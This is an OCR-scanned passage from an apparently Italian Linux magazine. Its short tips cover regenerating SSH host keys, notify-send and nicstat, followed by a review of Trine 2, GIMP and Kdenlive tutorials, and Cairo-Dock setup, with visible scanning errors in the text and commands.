trebbero esserci più chiavi sul proprio 
sistema. Proprio per questo motivo, 
nel caso di rigenerazione delle chiavi, 
bisognerà prima conoscere tutte le ti- 
pologie presenti (basterà un ls /etc/ 
ssh per vedere tutti i file) così da effet- 
tuare altrettante riscritture. Giunti a 
questo punto non ci rimane che pro- 
cedere con la creazione e per farlo 
dovremo digitare tanti comandi quanti 
sono gli algoritmi di cifratura attual- 


host. _ecdsa_key -N ‘’ -t ecdsa - 
256 dove per il DSA e l'RSA dovremo, 
cambiare il nome del file, sostituire 
l'opzione -t ecdsa con -t rsa o -t dsa 
e in questi due ultimi casi si può anche 
omettere la lunghezza (in questo 
esempio -b 256). La direttiva -N serve 
invece per indicare la passphrase da 
utilizzare per la cifratura, che in questo 
caso è nulla (sono due singole apici). 
Considerata la criticità dell’operazio- 
ne, per effettuare la sovrascrittura del- 
le chiavi è necessario avere privilegi di 
amministratore. 


NOTIFICHE GRAFICHE 
SULLO SCHERMO 
Molte delle operazioni di ma- 
nutenzione di un sistema 
GNU/Linux si svolgono all'interno di 


una finestra del terminale, tramite l'uti- 
lizzo della shell, ma parte degli output 
dei programmi ed in modo particolare 
delle notifiche possono essere inviati 
anche graficamente sullo schermo uti- 
lizzando apposite utility. In questo 
modo, la finestra in cui è in esecuzione 
il programma o lo script potrà rimane- 
re nascosta (dietro altre) o minimizzata 
sicuri che il messaggio importante 
catturerà l'attenzione dell'utente. 
Uno dei programmi più comodi per 
svolgere questo compito e che fun- 
ziona con quasi tutti i gestori di fine- 
stre, è notify-send. Infatti consente, 
tramite alcune semplicissime opzioni, 
di gestire dei messaggi di notifica, farli 
sparire dopo un determinato periodo 
di tempo e inserire icone o livelli di ur- 
sul video un messaggio sarà sufficien- 
te digitare il comando: notify-send 
“Messaggio da inviare” e premere 
Invio. Aggiungendo poi un ulteriore te- 
sto tra un'altra coppia di doppie apici 
si inserirà l'eventuale corpo del mes- 
saggio (con un carattere non in gras- 
setto). L'opzione -u permette invece di 
specificare il livello di attenzione della 
notifica ed è possibile scegliere tra 3 
livelli (low, normal o critical) a cui corri- 
spondono icone e comportamenti di- 
versi: ad esempio con -u critical avre- 
mo un'icona rossa e il messaggio sarà 
persistente e quindi dovremo cliccarci 
sopra con il mouse per farlo sparire. 
Per quanto riguarda le icone è anche 
possibile specificarne di diverse ri- 
correndo all’opzione -i. Premesso ciò, 
non rimane che la nostra fantasia per 
sfruttare questo strumento. Per ripor- 
tare sullo schermo il contenuto di una 
cartella il comando sarà il seguente: 
notify-send “Il contenuto della car- 
tella °pwd°” “is” dove nel titolo e nel 
gli output dei comandi pwd e Is (con 
cui ottenere rispettivamente il nome 
della cartella attuale e il suo contenu- 
to). Il sistema inoltre terrà traccia delle 
notifiche di livello normale (quelle che 
dopo un po’ scompaiono) e quindi in 
ogni momento basterà cliccare sulla 
relativa icona sulla barra degli stru- 
menti per accedervi, leggerle ed even- 
tualmente rimuoverle. 


TIENI D'OCCHIO LA LAN 
Osservare l'attività della sche- 
da di rete di un sistema è una 

pratica che andrebbe eseguita co- 

stantemente. Infatti, potrebbe permet- 
terci di scoprire utilizzi anomali, identi- 
ficare possibili problemi di sicurezza, 
aiutarci a capire come rendere più ve- 
loce il sistema e non ultimo compren- 
dere meglio il comportamento del no- 
stro PC. Ci sono tanti programmi per 
poter accedere a questi dati ma per un 
primo approccio a tale attività ci si può 
appoggiare a nicstat. Questo appli- 

cativo permette, senza richiedere im- 

postazioni complesse o opzioni diffici- 

li da ricordare, di visualizzare le 

statistiche principali relative all'attività 

delle schede di rete presenti sul siste- 
terminale e digitare il comando per ot- 

tenere una ricca serie di dati come: il 

nome dell'interfaccia, i KB/s ricevuti e 

inviati (KB e wKB), i pacchetti, la di- 

mensione media degli stessi (rAvs e 

wAvs) e la percentuale di sfruttamento 

dell'interfaccia (importante per indivi- 
duare subito se questa sia saturata 
oppure no). Nel caso in cui si volesse 
analizzare una sola interfaccia e ve- 
derne il suo comportamento nel tem- 
po, si può ricorrere all’opzione -i se- 

guita dal nome della scheda di rete e 

da un numero che indica l'intervallo in 

secondi di aggiornamento delle infor- 

mazioni. Ad esempio, con: nicstat -i 

eth0 2 avremo un aggiornamento ogni 

due secondi relativo alla scheda eth0. 


IL ritorno del trio 
delle meraviglie! 


E Un mago, un cavaliere e una ladra che si incontrano 
per la seconda volta per dare vita ad una nuova fantastica 


avventura: questo è Trine 2! 


| Licenza: Proprietaria Tipo: Gioco Sito Web: http:/itrine2.com 


zebyte Inc. (www.frozenbyte.com) e distribuito da varie piatta- 

forme on-line come Desura (www.desura.com/games/trine-2) 
e Steam (htip://store.steampowered.com/app/35720/), Trine 2 richiama 
i vecchi giochi platform game (platforming) nei quali il giocatore 
viene portato a comandare il proprio avatar su un percorso irto di 
difficoltà tra piattaforme sospese, funghi e foglie gigantesche, nemici 
da abbattere e ostacoli da superare. Trine 2 è il sequel di Trine en- 
trambi rilasciati per GNU/Linux rispettivamente nel Marzo del 2012'e 
nell'Aprile del 2011. Chi ricorda questo tipo di gioco ma non ha mai 
provato a giocare a Trine, tenti con la fantasia di portarlo nell'era mo- 
derna aggiungendone una grafica dettagliata e effetti curati nei più 
piccoli particolari il tutto associato ad una storia avventurosa di origi- 
ne fantastica. Questo è Trine 2, un piccolo capolavoro da provare per 
gli appassionati del genere. 


S viluppato e pubblicato dalla software house finlandese Fro- 


NON PROPRIO PARSIMONIOSO! 
L'hardware non è solo un dettaglio 


Non si venga tratti in inganno dalla modalità platform game 
per pensare che le risorse necessarie possano risiede- 

re anche in un computer di diversi anni fa. Niente di più 
sbagliato poiché il motore di gioco, proprietario e di cui 

al momento ancora non se ne conosce il nome, utilizza 
diverse caratteristiche delle OpenGL e come tale occorre 
una scheda grafica con driver installati che le supporti e a 
partire dalla versione 2.1, Come modelli sono suggeriti la 
serie HD 3xxx di AMD/ATI oppure dalla GeForce 7600 e suc- 
cessive con almeno 512 MB di RAM video. Per il processore 
è suggerito almeno 2 GHz, 1 GB di RAM e circa 3 GB su hard 
disk in caso di installazione completa. 
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Fig.1*|l coloratissimo menu generale di Trine 2 


COME INSTALLARE TRINE2 


Da quando diversi titoli, una volta riservati solo a Microsoft Windows 
e più raramente al mondo MAC, hanno visto la distribuzione per 
GNU/Linux su piattaforme digitali come Desura, e da circa due anni 
anche su Steam, abbiamo analizzato più volte ta modalità di installa- 
zione e il lancio del gioco con l'uno (Desura, nel frattempo diventato 
Open Source) e con l'altro (Steam) client. Per Trine 2 il discorso è 
perfettamente identico osservando, in questo caso, che su Desura si 
trova solo la versione demo per Mac OS X. Per GNU/Linux dovremo 
affidarci alla piattaforma Steam installando l'omonimo client oramai 
presente su buona parte delle distribuzioni. Per questo motivo, ri- 
portiamo un semplice riassunto sulla dinamica da seguire: lanciato 
il client potremo provare la demo di Trine 2 cliecando su Negozio e 
inserendo nella casella di ricerca il testo Trine 2. Nei risultati optiamo 
per Trine 2 Demo e nella nuova schermata clicchiamo su Scarica 
Demo. Al termine del download avvieremo il gioco andando in Li- 
breria e, dopo aver scelto Trine 2 Demo nell'elenco (ipotizzando di 
aver installato più di-un titolo), premiamo Gioca: dopo qualche se- 
condo vedremo apparire la finestra di gioco. 


UN TITOLO, DIVERSE SORPRESE! 


Chi ha già provato e giocato con Trine non avrà difficoltà a 
immergersi nella nuova avventura. Per coloro i quali non co- 


Trine 2 proprio come lo vuoi tu! 


Localizzazione in Italiano e effetti grafici sono le prime impostazioni da settare 


LANCIO DEL GIOCO 
Dal menu Lingua optiamo 
per Italiano e almeno per 
il primo lancio, lasciamo le voci 
Risoluzione schermo, Antialiasing 
e Livello dettaglio grafico ai valori 
di default: non ci si faccia fuorvia- 
re dall'aspetto a fumetti, il gioco è 
piuttosto pesante per il comparto 


® Sottotitoli e inci ftoliglto 


Vinqua/gitdo Fualish 


x 
PONIRAZETEA 


so INITALIANO 
02 Dopo una breve e suggesti- 
va animazione, clicchiamo 
su Fai clic su Avvia al fine di giun- 
gere al menu generale. Dirigiamoci 
subito sulle impostazioni cliccando 
sull'omonima voce, quindi su Impo- 
stazioni lingua assicurandoci di aver 
premuto Sì in Sottotitoli e Italiano 
(in Sottotitoli e menu). 


SEZIONE VIDEO 
O 13 Clicchiamo sul pulsante 

Indietro, quindi passiamo 
alla voce Impostazioni Video 
regolandone lo slider Luminosità 
e abilitando i Tooltip (meglio a 
comparsa). In Visibilità interfaccia 
scegliamo se visualizzare il livello 
di vita dei tre personaggi e in caso 


grafico! Clicchiamo su Avvia. affermativo scegliamone la grandezza. 


livelli dovremo avvalerci delle capacità dei tre personaggi che 
caratterizzano il gioco: un mago, un cavaliere e una ladra così 
come riportato nei primi tre passi del terzo tutorial. 

Le abilità dovranno essere opportunamente coordinate al fine 
di procedere nei vari livelli e a seconda delle situazioni che ci 


noscono il gioco, proviamo a fornirne una breve descrizione. 
L'obiettivo è quello tipico di un side-scrolling platform nel qua- 
le dovremo superare svariate decine di livelli risolvendo diversi 
enigmi logico-ambientali e al tempo stesso tenere a bada i go- 
blin che infestano ogni singolo livello! Per il superamento di detti 


Gli ultimi dettagli! 


Impariamo ad utilizzare i comandi di Trine 2, regoliamo l'audio e... iniziamo! 


Volume wadio 


Mover 


ife 
Viutordi 


T; pp q L'AUDIO 
0 1 Terminate le impostazioni 

tn i video clicchiamo su Indietro e 
optiamo per Volume audio: qui troveremo 
diversi slider le cui voci sono abbastanza 
eloquenti. Lo slider Master è il volume 
generale mentre i singoli suoni (effetti, 
dialoghi, musica) si possono equalizzare 
agendo sui rispettivi slider. 


N59. ì TASTIERA E MOUSE 
O i Premiamo Indietro per passare 
U/ | alla sezione Configura comandi 
che visualizzerà la funzione dei tasti e del 
mouse per ogni personaggio. Di default è 
selezionato il profilo generale: per impa- 
rare i tasti e le funzioni dei singoli perso- 
naggi è sufficiente cliccare sulle associate 
icone visibili al centro dello schermo. 


‘02 Hi LA DEMO 
M { Ritorniamo almenu generale 
.() 


‘0 e optiamo per Avvia demo: 
verrà avviata l'introduzione del gioco. 
Non facciamoci ingannare dalla staticità 
delle immagini: in ogni quadro il fumo va 
verso l'alto, le ruote dei mulini.girano, le 
fiammelle delle candele tremolano e gli 
stendardi ondeggiano! 
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Facciamo un po' di pratica 


Impariamo a gestire le abilità dei personaggi e iniziamo una nuova avventura! 


. ILMAGO... 
î i i Si inizia con il raccontare la storia e le caratteristi- 
che dei personaggi: possiamo cliccare su Salta per 
partire con l'allenamento. Il primo personaggio con il quale 
faremo pratica e il mago Amadeus: ci verranno insegnate tutte 
le potenzialità del personaggio come spostare/sollevare oggetti 
e crearne di nuovi (scatole e assi). 


- . sELALADRA 
U È arrivato il momento di fare pratica con Zoya la ladra! 
Poiché dovrà muoversi furtivamente, le armi a disposi- 
zione saranno un arco con frecce e un rampino attraverso il quale 
può superare ostacoli in altezza arrampicandosi sulla fune e/o 
ondeggiando per poi lanciarsi sulla nuova zona da raggiungere. 


PEA 


presentano davanti di volta in volta: il passaggio dall'uno all'al- 
tro personaggio è immediato e semplice e avviene con i tasti 
1, 2 e 3! Ad esempio, esistono situazioni nelle quali occorre 
scalare un muro eccessivamente alto per Amadeus e Pontius 
e in questo caso il rampino di Zoya risolverà questo apparente 
impasse. In qualche caso occorre deviare, attraverso un tronco 
cavo, una cascata d'acqua sul terreno affinché faccia crescere 
dopo pochi secondi funghi giganteschi sui quali arrampicarsi 
per proseguire nel percorso! In sostanza, l'avanzamento di livel- 
lo, o la semplice prosecuzione nel percorso del livello che stia- 
mo affrontando, è sempre piacevolmente irto di sorprese e al- 
terna momenti nei quali Pontius dovrà far sfoggio di tutta la sua 
forza e potenza ad altri in cui dovremo coordinare le abilità dei 
tre personaggi utilizzando solo ia logica senza brandire alcuna 
arma. Un'ultima sorpresa prima di terminare: le Impostazioni 
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U P, Terminato l'apprendimento di Amadeus il gioco 
automaticamente passa al secondo personaggio, il 

cavaliere Pontius. Cambia il paesaggio del gioco e si aggiungono 

nuovi effetti grafici. Pontius ha a disposizione delle armi: ad esem- 

pio spada con scudo e un martello. Possiamo passare dall'una 

all'altro utilizzando la rotella del mouse. 


, INIZIAL'AVVENTURA! 
0 b, Terminato l'apprendimento delle abilità di Zoya si verrà 
proiettati nell'avventura di Trine 2. In figura, un tratto 
dove è Amadeus a dover districare la situazione. Ricordiamo che 
nella versione demo non è possibile salvare il gioco nel punto di 
arrivo tanto meno scegliere e/o riavviare il livello. 


3D stereoscopico e le tre voci Separazione, Convergenza 
e Profondità interfaccia. Queste sezioni del menu sono note 
anche come Stereoscopic rendering ad indicare che il gioco 
supporta nativamente la tecnologia NVIDIA 3D Vision: in ge- 
nere, viene abilitata automaticamente appena viene rilevato un 
driver, e quindi una scheda grafica, che supporti la suddetta 
tecnologia. Allora i tre slider presenti nella sezione indicata per- 
mettono di impostare al meglio la separazione, la convergen- 
za e la profondità di campo, proprietà da adattare alle nostre 
preferenze qualora optassimo per una visione del gioco con gli 
occhiali 3D! Per chi ancora non l'avesse capito, Trine 2 non solo 
è uno dei migliori platform-game in circolazione vista l'attenta 
cura della grafica e effetti nei più piccoli dettagli, ma il 3D non è 
ottenuto secondo le usuali modalità note dalla maggioranza dei 
giochi ma seguendo l'esempio dei film in 3D! 


Disegna 


con il fuoco! 


M Hai voglia di sbizzarrire la tua creatività e creare dei ritratti 
infuocati? Con l’aiuto di GIMP è tutto semplice! Ecco come fare 


1 fuoco riveste da sempre un grande fascino: non è un caso che sia 

l'elemento fondante della maggior parte dei riti religiosi fin dalla 
preistoria. Del resto, fino a poche centinaia di anni fa, non vi era 
altro modo per riscaldarsi o vedere al buio. Il fatto è che le fiamme 
stesse sono di per sé gradevoli da osservare: le loro forme appaiono 
come pennellate di colore. Hanno qualcosa di artistico. È per que- 
sto motivo che nella comunicazione fotografica possono risultare 
molto importanti: scatenano sensazioni positive. Ecco perché una 
tecnica che si vede spesso in varie fotografie consiste nel “dise- 
gnare” un soggetto con delle fiamme. In altre parole, considerato 
che una fiamma è fondamentalmente una serie di tratti verticali, è 
effettivamente possibile utilizzare delle piccole immagini di fiamme 
per formare la sagoma di un oggetto, mettendo ciascuna di queste 
piccole fiamme una accanto all’altra. Naturalmente è possibile 
realizzare un effetto del genere semplicemente disegnando sopra ad 
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una fotografia, con un pennello, delle fiamme. Ma, proprio per la 
complessità di questa figura, il risultato non sarà molto realistico: 
è difficile disegnare delle fiamme che sembrino reali! La soluzio- 
ne più semplice consiste nell’utilizzare delle fotografie di fiamme 
vere, da sovrapporre poi all’oggetto originale. Grazie a programmi 
di fotoritocco come GIMP, infatti, possiamo costruire dei veri e 
propri disegni unendo più immagini di fiamme e dar loro una forma 
complessiva simile a quella di un altro oggetto grazie alle maschere 
di livello. Naturalmente, per ottenere un risultato davvero credibile, 
una semplice maschera di livello non basterà: serviranno alcuni 
trucchi con i colori, in modo da ottenere la tonalità di giallo-arancio 
tipica delle fiamme del legno (noi lavoreremo con fiamme dal colore 
caldo e non con fiamme blu, che hanno un colore troppo freddo). 
Inoltre, una sfumatura gaussiana ci consentirà di ottenere un baglio- 
re che è tipico delle fiamme vere e proprie. 


Ritagliamo il nostro soggetto 


Meglio disfarsi dello sfondo: solo così potremo lavorare più agevolmente 
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SELEZIONE COL LAZO 

Cominciamo aprendo l'immagine originale in GIMP. 

Selezioniamo il soggetto con lo strumento di selezione 
Lazo. Possiamo impostare una sfumatura per i margini, in modo 
da non renderli troppo netti. 
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SU UN NUOVO LIVELLO 

Rendiamolaselezione fluttuante (Ctrl+Maiusc+L) 

e inseriamola in un nuovo livello premendo il 
pulsante Nuovolivello. Scaliamola poi in modo che occupi 
circa 3/4 dell'intera immagine. 
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CHE COS'È UNA FIAMMA? 


È fondamentalmente del plasma freddo: non è, infatti, la fiamma 
a possedere calore, essa è soltanto luce. Il calore viene prodotto 
dalla combustione, e la fiamma è a sua volta un prodotto del 
calore, Detto in altre parole, la fiamma è data dai prodotti gas- 
sosi della combustione (ad esempio, la combustione del legno 
produce certamente ossidi di carbonio) che si ritrovano ad avere 
più energia del dovuto a causa della reazione.chimica di combu- 
stione, e quindi ne cedono una parte sotto forma di fotoni. 

È per questo motivo che le fiamme appaiono sempre dirette 
verso l'alto (un gas caldo sale verso l'alto) e generalmente 
hanno una forma affusolata. Ma, nel caso vi sia uno spostamento 
d’aria laterale, tendono a dirigersi verso il flusso dell’aria (la 
fiamma infatti segue il movimento del gas, che a sua volta segue 
lo spostamento dell’aria circostante). 


® Fig. 1° L'immagine da cui siamo partiti ed il ritratto finale 


L'immagine prende...fuoco! 


Utilizziamo immagini di fiamme per disegnare la sagoma del soggetto 
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COLORE GRADIENTE 


Aggiungiamo un ulteriore livello sotto a quello 

appena creato: in esso dovremo inserire un gra- 
diente lineare (o radiale se preferiamo) lungo la diagonale 
dell'immagine con due tonalità di rosso. Il rosso più chiaro 
deve essere dalla parte del soggetto. 


UN NUOVO LIVELLO 

Creiamo un nuovo livello con fondo trasparen- 

te: è in questo che andremo a posizionare le 
varie fiamme, quindi ci conviene dargli un nome del tipo 
“fiamme” in modo da riconoscerlo facilmente. Il livello 
deve essere posizionato sopra a tutti gli altri. 
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CON PIÙ CONTRASTO 

Spostiamoci sul livello contenente l'immagine 

del soggetto e portiamo la sua opacità ad un 
valore pari a circa il 20% (molto dipende dall'immagine utiliz- 
zata). Scegliamo poi lo strumento Colori/Curve e disegnia- 
mo una curva ad S per aumentare il contrasto. 


MER ALINA mor è ire Rd Ra 000 non 
dudoe prnapra joel Gue padane mi Posvner sorto Peire. és 
% DARAI RECANTI 0 RENT » 


UNA PRIMA FIAMMA 

Ora, carichiamo l'immagine di una fiamma (ad 

esempio una trovata su Internet) utilizzando il 
menu File/Apri come livelli. L'immagine avrà lo sfondo nero: 
selezioniamolo con Selezione colore e cancelliamolo (si può 
impostare una soglia pari a 25). 


Fig. 2 e Inun ingrandimento si 
notano i lineamenti del volto 


Una maschera per seguire la forma del soggetto 


Sfruttiamo le maschere di livello per migliorare l’aspetto finale dell’insieme di fiamme 


Selezioniamo le fiamme prelevate da Internet e co- Possiamo usare la gomma per cancellare le fiam- 


piamole sul livello “fiamme”, che deve essere impo- me che coprono occhi, orecchie, e bocca. Andiamo 
stato in modalità Somma. Continuiamo a copiare le fiamme su a lavorare sul livello che contiene la fotografia del soggetto: 
questo livello in modo da seguire la forma del soggetto. selezioniamo tutto (Ctrl+A) e copiamo il suo contenuto (Ctrl+C). 
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Clicchiamo ora sul livello “fiamme” col tasto destro Ancoriamo la selezione fluttuante alla maschera di 
e scegliamo la voce Aggiungi maschera di livello, impo- livello, con il pulsante ancora. Correggiamo poi la lu- 
standola con colore bianco. Ora, incolliamo in essa la selezione minosità con lo strumento Colori/Luminosità e contrasto: si deve 
precedente (Ctrl+V), spostandola se necessario. riconoscere la forma del soggetto. 


IN TONI DI GRIGIO 
01 Torniamo a lavorare sul livello con la fotografia 
del soggetto. Dobbiamo desaturarlo, quindi utiliz- 
ziamo lo strumento raggiungibile dal menu Colori/Desatura. 
L'impostazione corretta da utilizzare è Luminosità. 
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CONI TONI CHIARI 
03 Impostiamo la modalità del livello su Solo toni 
chiari. Coloriamo l'immagine con una tonalità 
arancione: avviamo lo strumento Colori/Colora e scegliamo 
la tonalità 110. La saturazione deve essere superiore al 50: 
una volare come 65 può andare bene. 


ALTRA MASCHERA 
05 A questo punto, non ci resta che cliccare sul livel- 
lo contenente l'immagine del soggetto col tasto 
destro del mouse e scegliamo la voce Aggiungi maschera di 
livello. La maschera deve essere realizzata come copia del 
livello in scala di grigi. 
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ABBASSIAMO | TONI 
si Adesso procediamo a correggere la sua curva di 
luminosità: apriamo lo strumento Colori/Curve e di- 
segniamo un ramo di parabola, tale da abbassare molto sia le 
ombre che i mezzitoni. 
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L'AREA GIUSTA 
04 Uniamo i tre livelli attuali cliccando su di essi col 
tasto destro del mouse e scegliendo Fondi in basso. 
Aggiungiamo un nuovo livello: deve essere colorato di nero a 
tinta unita. Questo livello va posizionato sotto a quello risul- 
tante dalle due fusioni. 
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UNA NEBBIOLINA 
06 Aggiungiamo infine, lavorando sulla maschera 
di livello, una sfocatura gaussiana con valore 80. 
L'ultima correzione da fare è un aumento della luminosità 
{circa 80) e del contrasto [circa 60) con l'apposito strumento 
Colori/luminosità e contrasto. 


Dal giorno alla notte 


E Ecco come ottenere l'effetto “day to night” che ci permette di 
simulare una ripresta notturna con immagini girate in pieno giorno 


irare delle scene notturne può essere un problema, 

soprattutto per un cineamatore che non dispone di 

grandi fondi. Infatti, per eseguire delle buone riprese 
(che non vadano a scatti) durante la notte è necessaria una 
buona illuminazione. Sembra strano, perché i nostri occhi si 
abituano subito al chiarore della luna. Le cineprese, purtrop- 
po, non sono altrettanto sensibili. E, a volte, per illuminare 
pochi metri di terreno serve una lampada molto potente. Cer- 
to, Stanley Kubrick girò “Barry Lyndon” senza l'ausilio di illu- 
minatori, solo con le fonti di luce naturali e delle candele. Ma 
aveva una pellicola sensibile 400 ISO che, come tutte le pel- 
licole, poteva essere tirata ad una sensibilità anche maggiore 
senza troppo rumore nell'immagine (cosa che col digitale non 
si può fare, perché i sensori sono molto più rigidi). Inoltre, 
aveva adattato per la propria cinepresa un obiettivo Zeiss con 
apertura relativa di diaframma pari a 0,7. Ed è probabile che 
noi non saremo in grado di procurarci qualcosa del genere. 
In realtà, la fotocamera Sony A7S ha la capacità di riprendere 
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senza troppo rumore anche scene notturne a luce naturale. 
Ma il solo corpo macchina costa più di 2000 euro. Dobbiamo 
quindi rinunciare a girare quelle scene notturne che avevamo 
immaginato? No, se siamo disposti ad accettare un risultato 
che forse non sarà perfetto, ma che potrà comunque con- 
vincere gli spettatori. Grazie alla correzione digitale dei co- 
lori, infatti, possiamo trasformare in modo quasi automatico 
un'immagine ripresa di giorno in una sequenza dai classici 
toni blu scuro della notte. Cerchiamo quindi di capire come 
appare una ripresa notturna: innanzitutto, le alte luci sono di 
colore blu: questo è un effetto ottico, perché i nostri occhi 
sono in generale molto sensibili al blu (tecnicamente, il cielo 
di giorno è viola, ma noi lo vediamo blu perché percepiamo 
maggiormente il blu piuttosto che il viola). Gli altri colori, il 
rosso in particolare, sono abbastanza desaturati: si ricono- 
scono appena. Un altro dato importante è la luminosità: sia 
le ombre che i mezzitoni devono risultare abbastanza scuri, e 
solo le alte luci compaiono con una discreta luminosità. 


Prepariamo la clip video originale 


Gettiamo le basi posizionando la nostra clip e i due effetti di colore 


LA CLIP DI PARTENZA 

La prima cosa da fare è sempre caricare in un 

nuovo progetto Kdenlive la clip che vogliamo 
trasformare in notturna. Ovviamente, la clip va inserita 
in una delle tracce video, ad esempio Video3. 


DUE EFFETTI COLORE 

Alla nostra clip devono essere applicati due effetti: 

Saturazione e Hue shift. | loro valori, però, al mo- 
mento non ci interessano: possiamo provare a spostare le ap- 
posite slider ma il risultato che vediamo adesso è fuorviante. 
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UN CIELO STELLATO... 


Ma c'è un particolare: gli oggetti più vicini alla cinepresa sono legger- 
mente più luminosi degli altri. Questo perché la luce emessa da ogni 
oggetto si disperde nello spazio, e dunque decresce in funzione della 
distanza. In queste pagine, cercheremo di tenere conto di tutti questi 
particolari. Inoltre, vogliamo anche aggiungere un dettaglio irrealisti- 
co: il cielo stellato. Si tratta di una cosa irreale perché, e se abbiamo 
mai provato ad eseguire delle vere riprese notturne ce ne saremo resi 
conto, le stelle sono troppo deboli per comparire nel filmato. Per poter 
riprendere le stelle è infatti necessario un tempo di esposizione molto 
alto, anche di qualche secondo. Nei filmati Full HD, invece, il tempo di 
esposizione massimo è un cinquantesimo di secondo: troppo poco 
per le stelle. Aggiungerle digitalmente al filmato, però, conferità mag- 
giore credibilità al video: del resto, gli spettatori associano automati- 


In sfumature di blu 
Diamo all'immagine il classico tono blu notturno 
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CAMBIAMO I LIVELLI 
01 Aggiungiamo alla clip l'effetto Livelli, impo- 
stato sul canale Luma, modificando il livello di 
nero in entrata. Un valore vicino a 120 dovrebbe andare 
bene: vogliamo rendere l'immagine più scura senza però 
esagerare. 


camente la presenza delle stelle alla notte, ed accetteranno quindi più 
facilmente l'effetto, senza chiedersi più di tanto se sia davvero possi- 
bile riprendere il cielo stellato con una semplice cinepresa amatoria- 
le. Come sempre, è possibile vedere un video d'esempio all'indirizzo 
www.youtube.com/watch?v=0ru3PHOIWBM 


MI Fig. 1 » Un fotogramma prima e dopo l'applicazione 
dell'effetto "day to light" 
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MODIFICA IL ROSSO 
0 Ci serve un ulteriore effetto Livelli, che lavori 
però sul canale Rosso. In questo caso, vogliamo 
aumentare il contrasto del solo canale rosso, quindi por- 
teremo il livello del nero in ingresso intorno a 125 e quello 
del bianco a 915. 


SPOSTAMENTO HUE 
03 Adesso possiamo tornare ai due effetti Satura- 
zione e Hue Shift. La saturazione deve avere un 
valore inferiore a 100, per esempio 80 può andare bene. In- 
vece, lo hue deve essere scelto in modo da dare un tono blu 
all'immagine. 
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PRIMO RENDERING 
0 La prima fase di lavorazione è terminata: il vi- 
deo ha già i toni di colore corretti, ma è ancora 
troppo luminoso. Per ora, renderizziamo l'attuale risul- 
tato in un file ad alta qualità (ad esempio un MP4 a 44000 
KB/s): è su questo che lavoreremo. 


N Fig.2 Il bagliore luminoso che fa da 
contorno agli oggetti, come se la luna fosse 
una retro-luce 


LE CONDIZIONI DI RIPRESA 


Un buon effetto dipende da un buon orario! 


L'effetto che presentiamo non è perfetto: nelle produzioni professionali, si procede 
con il fotoritocco manuale di ogni fotogramma (per esempio con CinePaint, la versione 
per cinema di GIMP). Noi, invece, abbiamo voluto automatizzare quanto più possibile 
l'intera procedura. La resa dell'effetto è migliore se le immagini originali sono state 
riprese in una giornata nuvolosa: troppo sole, infatti, rende alcuni oggetti eccessiva- 
mente brillanti, e fornisce delle forme strane alle ombre (in generale, mezzogiorno 

è una buona opzione perché si vedono meno ombre). Gli alberi, poi, creano notevoli 
difficoltà: le loro foglie, muovendosi, provocano un leggero bagliore che è difficile da 
eliminare. È decisamente più semplice se la ripresa che abbiamo effettuato compren- 
de soltanto edifici. Meglio, quindi, immagini riprese in città piuttosto che in campagna. 


Spegniamo la luce, accendiamo le stelle 


Inseriamo il cielo stellato nel filmato e rendiamo l'immagine più scura 


IL CIELO STELLATO 

Se vogliamo inserire l'immagine di un cielo stel- 

lato al posto del cielo attuale, sarà importante 
prepararne una: possiamo fotografare un cielo notturno e 
poi correggere la foto con GIMP, se necessario. 0, magari, 
cercare sul Web un'immagine già pronta all'uso. 


LE NOSTRE DUE CLIP 

IL passo successivo consiste nel creare un nuo- 

vo progetto di Kdenlive con l'immagine del cielo 
stellato e la clip video renderizzata poco fa: il cielo deve 
essere posizionato sopra al filmato. Ad esempio, possono 
essere posti rispettivamente in Video2 e Video3. 


DI NUOVO IL VIDEO 

Tra la due clip va inserita una transizione di tipo 

darken estesa per tutta la loro lunghezza. Succes- 
sivamente, in Video1 inseriamo di nuovo il filmato renderizzato 
poco fa, applicando una transizione lighten per tutta la durata 
del filmato stesso. 


IL BLU È L'ULTIMO 

Aggiungiamo alla clip della traccia Video1 l'effetto 

Inverti: ora, ilcielo stellato dovrebbe essere visibile. 
Applichiamo alla stessa clip l'effetto Cubo sfocato, con fatto- 
re di sfocatura 5 e moltiplicatore verticale pari a 3 poco più 
(quello orizzontale ad 1). 


Luminosità diversa in base alla distanza 


Sfruttiamo il Rotoscope per dare agli oggetti più lontani minore luminosità 


UN NUOVO FILE VIDEO 
0 Il risultato è già molto vicino a quello che vo- 
gliamo ottenere, ma probabilmente ancora è 
troppo luminoso. Quindi, renderizziamo l'attuale pro- 
getto in un nuovo file video ad alta qualità e proseguia- 
mo con la nostra opera. 


UNA COMPOSIZIONE 

Adesso, creiamo un nuovo progetto inserendo il 

file appena creato: dobbiamo caricare tale filma- 
to sia nella traccia Video3 che nella Video2, sovrapponendo 
le due clip identiche con una transizione Composito per tut- 
ta la loro lunghezza. 


CURVE DI COLORE 
0 Sulla clip di traccia Video2, applichiamo l'effet- 
to Curvature. L'effetto va impostato sul canale 
Luma, e la curva va disegnata in modo da tenere molto 
basse sia le ombre che i mezzitoni, ma abbastanza alte 


le alte luci. 


FRAME PER FRAME 

Utilizziamo il Rotoscope per rendere visibili della 

clip di Video2 soltanto gli oggetti che dovrebbero 
comparire come vicini alla cinepresa. È ovviamente neces- 
sario creare continui keyframes per seguire lo spostamen- 
to degli oggetti. 


EFFETTO ROTOSCOPE 

Il risultato va bene per gli oggetti in lonta- 

nanza. Quelli in primo piano, al contrario, 
dovrebbero essere luminosi proprio come la clip di 
Video3. Carichiamo quindi un effetto Rotoscope sulla 
traccia Video2. 
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RENDERING E CURVE 

Possiamo poi renderizzare il risultato in un 

nuovo file, ed utilizzare questo per il montag- 
gio con le altre scene del nostro video. Eventualmente, 
possiamo ancora correggere la luminosità del canale 
Luma e del canale Blu con effetti di tipo Curvature. 


UBUNTU 
PROPRIO COME 
MAG OS X! 


Si chiama Cairo-Dock ed è una delle migliori dockbar 
disponibili per GNU/Linux. In pochi minuti puoi 
rendere la tua distro uguale al sistema operativo 
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iciamoci pure la verità: la barra laterale di Ubuntu non 
è gradita da tutti gli utenti dell'OS firmato Canonical e, 
più in generale, ad essere guardato con cattivo occhio è 
Unity, l'ambiente desktop predefinito della distro. Ma, fortunata- 
mente, noi utenti del Pinguino siamo liberi di personalizzare la 
nostra distro come più lo desideriamo. E se volessimo installare 
una dockbar che ricalchi lo stile di Mac OS X? Niente paura, ce ne 
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UBUNTU SOFTWARE CENTER 

Clicchiamo sull'icona dell'Ubuntu Software Center. 

Compiliamo il campo di ricerca con “cairo-dock” e 
confermiamo con Invio. Avviamo l'installazione con Installa. 


TUTTO PRONTO! 


Cairo Dock non si avvia automaticamente 

(almeno per ora). Clicchiamoci sul lanciato- 
. re presente nella barra laterale di Unity per vedere 
